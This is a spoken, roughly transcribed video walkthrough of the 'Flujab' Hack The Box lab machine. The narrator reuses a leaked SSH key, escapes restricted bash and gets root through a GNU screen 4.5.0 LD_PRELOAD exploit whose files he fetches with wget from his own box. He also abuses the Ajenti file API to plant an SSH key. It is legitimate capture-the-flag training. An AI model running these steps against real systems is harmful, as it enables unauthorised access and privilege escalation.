I think that's J. There we go, we're extracting. And then this looks like fingerprints are done in MD5 because that looks like 32 characters. It's certainly more than this. So let's do SSH keygen -l I think capital E MD5 -f key.pub. If I can type. There we go. So let's do sed s :g and see if this key exists, because I think this is the fingerprints. So we go into RSA 4096. We can do find .grep for the fingerprint, and there we go. So we could cat key.pub and cat this.pub. Oh, I forgot the -232. And we can see these are the same keys, but the fingerprint did that for us. So if we cat this, or instead of cat, let's copy to HTTP boxes Flujab keys. We'll call compromised.pem ls chmod 600 sh-i compromise.pem, and this will be Dr. No at Flujab.htb. Connection reset by peer, so it looks like our host.allow file has to be set again. So let's go to open Etsy host.allow, and then we can do sshd 10.10.10 or 10.10.14.3, and we also wanted all. I don't know which one of these it was, but I did them both, and that's when it worked. There we go. And now we are finally on the box. So let's do a ls. We got user.text. If we do wc-c, user.text, wc command not found, echo path, and we got user rbin. So it looks like we are now in restricted bash. So if we do export path is equal to /bin, path is read only. So if we do double tab, we can see commands we can do. So let's try cat. So cat etc passwd. So we can cat files. So let's see, what other commands do we have? If we went through all these and did a GTFOBins on them, we should see, I think make is here. Make is our command. So you could do a Google search, GTFOBins. Same thing as lolbins, just for Linux. And if you just searched each of these and found make, you'd see there's one with a shell. So you can just copy this, paste, copy the next line, paste. And now if we do pwd, home.no, wc-c, user.text, wc is not found, export path is equal to, let's do echo path. Just make it equal to what mine is. And now wc-c, user.txt, you got that. So that's one way around this rBash. So if we exit completely, we can do another one. So we can just do -t bash to force a terminal. And I think I'm gonna have to edit this host thing again. So let's go back, save. Go. Come on. Save. That's weird. We can't SSH at all. There we go. So let's try that -t again. Come on. Try SSH Dr. No at 10.10.10.124 -i compromised.pem. And this is keys /compromise.pem -t bash. Could have swore it was -t. I don't know why this one's not working. 10.10.10.124. Weird. But that -t, just like in other videos, is a way to bypass it. So we do echo path. Export path is equal to / do echo path. Paste. And it's not read only. So there's two ways out of that. So I'm running low on time, so I'm not going to do lin enum. I'm just going to look at setuid binaries manually. So let's do find /-perm 4755, pipe errors to dev null, and let's see what we have. So looking at this, it's weird because this is not the normal path where screen is installed. So if we do which screen, we can see screen is user bin screen. If we do lsla, it is not a symlink. So let's compare these two versions of screen. And we see different versions. So these are different files, much different sizes. This one is much bigger than this. So this leads me to believe it's statically compiled, while this one is dynamically. But if we do this screen -v, we get screen version 405. If we do this screen -v, wait. Huh. I thought they'd be different versions. dpackage-l grep screen. 450. That says 4050. Not sure exactly what's going on there, but these are definitely different binaries. We do MD5sum on that, and of course this one, and they'd be different because you just see the file size difference. So let's go search exploit screen to see what's here. And we got GNU screen 450. So let's do search exploit -m to mirror. And then take a look at what this is with -x. So we got two files. First, we create a shell in library, then compile it, and then go. So let's see. Include stdio. So this is creating two files, libhacks.c and temp root shell. Libhacks is just the exploit, and libhacks is just a set UID binary. So it looks like we can do a LD preload attack against screen and have a set UID binary execute, or give set UID binaries the permissions. So let's try this. Let's see. Do we have GCC? Not found. Do we have locate on this? Locate not found. Find / grep GCC $to dev null. Thought I piped errors out. Oh, I gotta do it here. To dev null. User libgcc, user bin GCC. Echo path. User bin's not my path, so we can do echo path, or export path is equal to path user bin GCC user bin GCC. Wait a second. Is that a directory? That is. So it's a dead symlink. So let's just copy this on my local box. So let's do a new directory, vi 41154, and let's just create these two files and then compile them manually. So let's do copy, make dir exploit, cd exploit, vi libhacks.c, set paste, just cat 41154, it'll be easier to copy. So we can see this file, paste. So the drop shell is going to, do a chown to own this to root, which is 00, and then do a chmod to 4755. So this is definitely an LD preload, just executing commands. So we can save that, and we can compile it. So gcc-fpic shared ldl-o for out file, libhacks.so, and libhacks.c. There we go. We got the libhacks.so file. It's removing the source. We don't have to worry about that. We got a shell dropper. So let's just copy this. v root shell.c. Set paste. And then gcc-o root shell. And then the location root shell.c. ls. Okay. So we have both of those compiled. So let's see. It does cd etc, umask 000. So this means files created will be chmod with 777 because this is the inverse. Run screen with the binary. And then I guess this echo command will append the temp libhacks.so so it actually gets loaded. And when libhacks.so gets loaded, it does the chmod 00 on root shell along with the permission bits to make it set UID. Hopefully that all makes sense. Python m simple HTTP server. And now let's copy the files. .shm. Let's just do wget -r 10.10.14.3 port 8000 ls. And let's see, we wanted to copy, where does it go? So I think everything is in temp. So the first copy was gcc-o for our file temp root shell. Second copy is temp libhacks. So both files go in temp. So let's go back to SSH. cp libhacks.so to temp. cp root shell to temp. cd etc. umask 000. And now we want to execute this command. Run that. Directory run screen must have 755. I wonder if that is supposed to happen. Screen-ls. Do ls-la on temp. Files don't exist. cd/dev shm. That's weird. cp root shell temp exists. cp lib hacks.so to temp. Screen ls. Let's see. cd run. Oh. It's probably the screen version. Find /-perm. Let's use this. So specify that full path. And then this. Let's see. That looks better. And then we did this -ls. No sockets found. SLA temp. And we have root shell set UID bit owned by root. So if we just do temp root shell ID, we are now root. So wc-c root.txt, and that is the box. So let's go back and get a shell a different way. Let's say the SSH key was not compromised. So if we go back to Cherry Tree, the SSHD config had something very interesting. It had .sh authorized keys and access. So when we logged in to this application, we logged in as the sysadm user. If we go to home, come on, go all the way down, we're here. So it's a logical leap that we are this user. So let's see if we can write a file. So let's write, please subscribe, and kudos to 0xdf for finding this method. I think he's the one that told me about this. This is how he had done the box. So if we do home, sysadm, file write this, let's just name it test, save. It successfully saves. So we can write to his home directory. So if we go back into home, sysadm, we can see we wrote this file. So what we want to do is create an SSH key. So we'll do SSH key gen -f. We'll call this sysadm. Won't bother creating a what is it? Password on it. But let's copy this sysadm.pub and copy this over. So save it as. And if we go to home, sysadm, we can name this access. And for this method to work, the SSH had to be configured to allow access as a secondary file name. Because I don't believe in Ajenti, or the version we're running, we have permission to create directories. We do have permission to create files and change permissions of files, but we couldn't create this .sh directory, at least I couldn't. But because they had two different authorized key files, we could create this file. If we save it, it has saved successfully. So if we now try to SSH, we still won't be able to because the permission of this file is not 600. It's a weak permission. So if we try to SSH LSLA, CHMOD 600 sysadm, because the permissions have to be strong on both sides. And the IP is sysadm at 10.10.10.124. And of course the host allow file. Open etc host allow all 10.10.14.3. Let's just see if this does it. Save. Let's do SHD 10.10.14.3. Save. There we go. Public key is denied. So there's no good way in the GUI to change permissions of a file. But if we Googled or searched Burp, first, let's do HTTP history. We don't want to only show that. Let's show everything we've done. When we write a file, we're calling the API file system write. So what if we Googled like Ajenti Documentation and saw what the API exposed? So Ajenti, let's just search this string. Here we go. We got two different forms of documentation, major different versions, but this probably won't change too much. But we got the CHMOD, and there is this create directory. But if we try to do create directory, it'll fail. So let's see. Let's search for access. It's in a lot of things. File system write, host allow. Here we go. So here's us reading the file, and I don't know if, did I copy the quotes, or is this put on by the application? Let's open it one last time. Home, sysadm, access. So I didn't put on the quotes. That is by the application. So if we try create directory, we'll get URL not found. If we do chmod, we get an error message. Because if you look, the API says chmod is two different things. Path, and then you got to have the mode argument. And the mode is an integer. So if you look at previous commands, how they do this, let's see, here's right. They put the API path, the first argument, up here in the URL, and they put the argument down here. So if we go to the repeater tab, we want to make this a post request, not a GET. And then we need mode and, or not, is it mode? Yep, mode. And if we did 600, does this still error out? It does not, it just gives us null. And if we try to SSH, I'm guessing that, oh, we still get it denied. And this took a lot of troubleshooting by 0xDF. And what the application is actually doing, if you read a lot of the documentation, it wants integer. And basic Linux file permissions are in base 8 format because it is 4 bits, I believe, or 4 characters. And each of these can be 0 through 7, which is 8 characters. So if you Google for a base 8 to decimal, is this even an online thing? Let's do this. Base 8, 600. Decimal version is 384. And that is just, I believe, 3 to the 8th. Because we have 8 possible bits, 8 possible bits, 8 possible bits. So if we do 3 to the, or is it 8 to the 3rd? It's too late to do math. Oh, because it's not full 3. There's total of 512 bits, but this is a 6, not an 8. So you can just Google how to do that. Let's try setting this to 384 like the calculator said. There's some things I don't feel like wasting time on right now. And it's Friday night and I got to publish this video, so there we go. SSH-I, and we get in. So if we do ls-la, we can see access key is now 600. If we did a chmod as 600 and do a ls-la, you can see this file permission is all out of whack. So if we did like decimal to base 8 and did 600, we just chmodded this to 1130. And that's what this would give you. So that is the box. Hope you guys enjoyed it. Take care, and I will see you all next week.